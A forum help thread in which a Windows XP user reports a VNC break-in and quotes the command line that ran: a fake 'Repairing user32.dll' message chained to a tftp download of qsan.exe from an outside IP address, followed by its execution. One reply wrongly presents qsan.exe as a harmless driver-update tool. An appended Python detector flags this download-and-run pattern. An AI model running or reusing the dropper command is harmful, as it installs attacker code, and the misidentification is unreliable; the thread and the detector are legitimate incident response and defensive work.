OK, my home computer was hacked last night. I was working over VNC and I was sitting there taking a drink (of water..lol), and I noticed the task manager popped up, and the command line popped up and this script started running... So I ripped out my wireless adapter, and tried to figure out what just happened... here is what I GOT.
%comspec% /c ECHO Repairing user32.dll & echo Please wait... & tftp -i 75.5.227.42 GET qsan.exe & start qsan&
Now I have some important stuff on my computer so I need to find a way to figure out what QSAN.EXE DID..
IS THERE A PROGRAM that can record or show all actions of a .exe
I can't find anything on the .exe file. Do a system search and tell us where it's located..
what protections do you have?? do you have a firewall??
have you installed any new software?
C:\WINDOWS\system32
http://secunia.com/advisories/20107/
Regular XP Firewall and Symantec SAV Corp Ed.11.XXX WIN DEFENDER
No new software...ummm did you install that program??
Some more info that I found, but I just really need to know if anything was taken, that's why I want to know if there is anything that records what an .exe does.
http://forums.spywareinfo.com/lofiversion/index.php/t95333.html
I installed vnc,... what program exactly are you talking about?
No I did not install the qsan.exe... it was pulled from a tftp server by whoever compromised my system.
have you patched the program?
Yes, but right now I'm just trying to figure out what that executable does, or did anything leave my computer.
I was talking about the VNC program. The last reference you gave talked about patching it, so try that to stop it from happening again.. if you want, look at my signature and dl the programs you don't have and scan in safe mode.. what windows do you have?? look in the program folder of the vnc and see if that .exe is there
Ok,.. I'm running windows XP Pro...
Qsan.exe.. is not located in the programs folder .. it's located in c:\WINDOWS\system32
tftp -i 75.5.227.42 GET qsan.exe
That was in the script that was run... so it was pulled from somewhere..
QScan means your BenQ burner is phoning home to look for the latest driver updates...
If you don't have a BenQ burner then post back with more hardware info...
If it's qsan then the same thing is happening but for a RAID or IDE controller card.
Try uploading the file to VirusTotal and post the results here.
Due to lack of feedback, I am closing this topic. If you are the original poster and you would like this topic to be re-opened for any reason, PM me or another moderator and it can be arranged.
If you are not the original poster and you require help, please start a New Topic with information about your computer and your problem.
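An added example, not part of the thread: a small detector for the pattern in the command line quoted above, a `tftp ... GET` download chained with `&` to a command that runs the fetched file. The function names and the sample lines other than the thread's own command are constructed for illustration.

```python
import re
from typing import Optional

# Windows tftp.exe client syntax: tftp [-i] <host> GET <remote> [<local>]
TFTP_GET = re.compile(
    r"\btftp(?:\.exe)?\s+(?:-i\s+)?(?P<host>\S+)\s+get\s+(?P<remote>\S+)"
    r"(?:\s+(?P<local>\S+))?",
    re.IGNORECASE,
)

def stem(name: str) -> str:
    """File name without directory or .exe extension, lower-cased."""
    base = re.split(r"[\\/]", name.strip('"'))[-1].lower()
    return base[:-4] if base.endswith(".exe") else base

def find_tftp_dropper(cmdline: str) -> Optional[dict]:
    """Report a tftp GET and, if present, the later command that runs the file."""
    # cmd.exe chains commands with & and &&; split and drop empty segments.
    segments = [s.strip() for s in re.split(r"&+", cmdline) if s.strip()]
    for i, seg in enumerate(segments):
        m = TFTP_GET.search(seg)
        if not m:
            continue
        finding = {"host": m.group("host"), "file": m.group("remote"), "runs": None}
        fetched = stem(m.group("local") or m.group("remote"))
        for later in segments[i + 1:]:
            words = later.split()
            if words[0].lower() == "start":
                # skip switches and the optional quoted window title
                words = [w for w in words[1:] if not w.startswith(("/", '"'))]
            if words and stem(words[0]) == fetched:
                finding["runs"] = later
                break
        return finding
    return None

SAMPLES = [
    # command line quoted in the thread
    "%comspec% /c ECHO Repairing user32.dll & echo Please wait... & "
    "tftp -i 75.5.227.42 GET qsan.exe & start qsan&",
    # constructed: download only, nothing executed afterwards
    "tftp -i 192.0.2.10 GET switch-config.bin",
    # constructed: no tftp at all
    "ping 192.0.2.10 & echo done",
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(find_tftp_dropper(line))
```

A finding whose `runs` field is set is the download-then-execute case; a finding with `runs` of `None` is a transfer that was not followed by execution in the same command line.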